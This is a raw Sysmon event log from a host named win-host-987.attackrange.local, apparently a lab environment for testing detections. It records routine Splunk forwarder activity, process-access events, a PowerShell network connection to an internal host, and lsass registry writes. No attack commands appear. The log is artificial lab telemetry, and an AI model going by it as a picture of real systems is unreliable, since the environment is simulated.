13:10:06.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA36D552F1C73FA4C2DFBF60273B87D,SHA256=515E390872356E1D3E7CE4E31C057504F0CD18686FB1507307FE1C19A8ED3373,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:07.135{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B602E3C923FBDE053255776575D245,SHA256=0FF2FBE9139F08207F0319C923A621E4308D60D28580DCC1B9EC273F3309D0F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.928{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.925{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.925{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.909{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.378{B81B27B7-9F30-6140-4B56-04000000C801}61045644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.229{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.226{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.210{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5FCE2A9951CB0E59CC839A8792ED2E,SHA256=8A1F9B83A3CCFABA1DC93422688B6197BCB9B9D9CD71110BCAF11634C8B59750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E48885003619F6D03B453579832167BE,SHA256=99A43D9A184034EFE7A059FA5DC69BCCD638ABC8AF08B6998C5991E486F53AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BA854B17A0DC7714E022F92971A7E16,SHA256=B9202A7BFE57E52027FA4A93D5BE9E7835CEF716D310C754CA1C56D6C45D68B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B446FE2B2B9240FCD1CA04C952BDD6B,SHA256=5D542BD2E43BA6E54F9EC01DDE158A5F7D0ECEE5AED63F1DF1CE7B09342909CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:10.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C7F87552419B316558DC4AD4AC22763,SHA256=372152AE3F2A34B3ADFBFA83BE5A97F4683DD18317C99EB6C3E25B808A48C734,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:40.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50364-false10.0.1.12-8000- 23542300x800000000000000036496094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:11.275{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59537F51147313026EAB5384EC599396,SHA256=C174A254941BF420C7DD8A1380E58992234FCA00F33B9CA6F778054732251AAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:11.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E67B15155A034645ECC9FC16FD4E36A3,SHA256=7F1669487F3F8CE772C9FE3100411D9E7D1F064782A8BC342FE0741CF2E3B7C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:41.502{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50365-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:12.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED0DEF8D49A7598628350C5D231258EC,SHA256=FA53E0CDDCA18C63782B5DA90E401B5BAE841CC15312E895EF9F6B8D63AC74E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:13.322{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A322DDBB7CC6044AF089F5B516DF1B30,SHA256=DB1AE06E4FCC2B6C03DBF298F7AAF1BDFA093B1C123BA3CDEC928CC35218D814,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:14.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C06B8CCFAEAC1B4A69AF0EABD524320D,SHA256=2C8542E3E543E7EDA872FA854919C4B3C8A87338260FC920664655AB9E125CE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:15.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=539B031520D9A1C2E7ABFB971F28B168,SHA256=30D6C1934190C3EE702A1944ED38434B3B48D9DDD29E2E6CAA5253127D15263E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:15.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4835F2AE640A5CE538DBA32577A8BCEE,SHA256=99FC1701B7FECBED0A76220895D52D3EDAAF08C4AE5F2C07ED8C2C82FB4F72C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036496109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a2c3382) 13241300x800000000000000036496107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a961-0x7a29a397) 13241300x800000000000000036496106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a969-0xdbee0b97) 13241300x800000000000000036496105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0x3db27397) 13241300x800000000000000036496104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a2c3382) 13241300x800000000000000036496102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a961-0x7a29a397) 